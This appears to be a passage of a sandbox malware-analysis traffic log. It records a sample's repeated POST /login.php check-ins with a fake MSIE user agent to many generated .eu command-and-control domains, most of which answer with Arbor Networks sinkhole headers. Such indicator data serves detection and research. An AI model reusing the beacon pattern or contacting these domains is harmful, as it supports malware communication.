Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:33 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuqufyduras.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:42:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vofozymufok.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:33 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: cihunemyror.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuqohyxeqak.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: marytymenok.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qebahilojam.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:49 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lykemujebeq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:49 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: norumikemem.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryleryqacic.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jefapexytar.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nojejecebuw.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:42:31 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qexofyqihid.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: marytymenok.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:39 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ciliqikytec.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gatedyhavyd.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qetuluvolos.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:55 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: cihunemyror.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nopegymozow.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:39 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: puvybivihox.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:54 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: puregivytoh.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryqecolijet.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qekenilacap.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Fri, 02 Sep 2016 17:41:54 GMT

Server: Apache/2.2.22 (Debian)

Vary: Accept-Encoding

Content-Length: 287

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</addres
s>.</body></html>.....


POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qekenilacap.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Fri, 02 Sep 2016 17:41:54 GMT

Server: Apache/2.2.22 (Debian)

Vary: Accept-Encoding

Content-Length: 287

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</addres
s>.</body></html>.HTTP/1.1 404 Not Found..Date: Fri, 02
 Sep 2016 17:41:54 GMT..Server: Apache/2.2.22 (Debian)..Vary: Accept-E
ncoding..Content-Length: 287..Content-Type: text/html; charset=iso-885
9-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>404 Not Found</title>.</head>
;<body>.<h1>Not Found</h1>.<p>The requested UR
L /login.php was not found on this server.</p>.<hr>.<ad
dress>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</a
ddress>.</body></html>...

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: fodakyhijyv.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:45 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: puregivytoh.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ganycyhywek.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:48 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ciliqikytec.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xugiqonenuz.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 200 OK

Connection: close

Set-Cookie: jsessionid=25d7c5d399560c85bd203fa61188924f; Expires=Fri, 01 Sep 2023 17:42:02 GMT

Date: Fri, 02 Sep 2016 17:42:02 GMT

Content-Length: 0

Content-Type: text/plain; charset=utf-8

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuxusujenes.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 02 Sep 2016 17:50:46 GMT

Content-Type: text/html

Content-Length: 579

Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx/1.4.
6 (Ubuntu)</center>..</body>..</html>..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..<!-- a 
padding to disable MSIE and Chrome friendly error page -->..<!--
 a padding to disable MSIE and Chrome friendly error page -->..<
!-- a padding to disable MSIE and Chrome friendly error page -->..&
lt;!-- a padding to disable MSIE and Chrome friendly error page -->
..<!-- a padding to disable MSIE and Chrome friendly error page --&
gt;......


POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuxusujenes.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 02 Sep 2016 17:50:46 GMT

Content-Type: text/html

Content-Length: 579

Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx/1.4.
6 (Ubuntu)</center>..</body>..</html>..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..<!-- a 
padding to disable MSIE and Chrome friendly error page -->..<!--
 a padding to disable MSIE and Chrome friendly error page -->..<
!-- a padding to disable MSIE and Chrome friendly error page -->..&
lt;!-- a padding to disable MSIE and Chrome friendly error page -->
..<!-- a padding to disable MSIE and Chrome friendly error page --&
gt;..HTTP/1.1 404 Not Found..Server: nginx/1.4.6 (Ubuntu)..Date: Fri, 
02 Sep 2016 17:50:46 GMT..Content-Type: text/html..Content-Length: 579
..Connection: keep-alive..<html>..<head><title>404 N
ot Found</title></head>..<body bgcolor="white">..<
;center><h1>404 Not Found</h1></center>..<hr&g
t;<center>nginx/1.4.6 (Ubuntu)</center>..</body>..&l
t;/html>..<!-- a padding to disable MSIE and Chrome friendly err
or page -->..<!-- a padding to disable MSIE and Chrome friendly 
error page -->..<!-- a padding to disable MSIE and Chrome friend
ly error page -->..<!-- a padding to disable MSIE and Chrome fri
endly error page -->..<!-- a padding to disable MSIE and Chrome 
friendly error page -->..<!-- a padding to disable MSIE and 
<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gadufiwabim.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kemocujufys.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kefuwidijyp.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: pupujeguper.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:50 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: puvybivihox.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:54 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jefapexytar.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qeqinuqypoq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:33 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nozulufynax.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:42:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galokusemus.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qekikyvutic.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:42:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: norumikemem.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:46 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ganycyhywek.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:48 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tufecagemyl.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:46 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuqufyduras.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:42:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qexofyqihid.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kevedorozup.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Fri, 02 Sep 2016 17:41:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

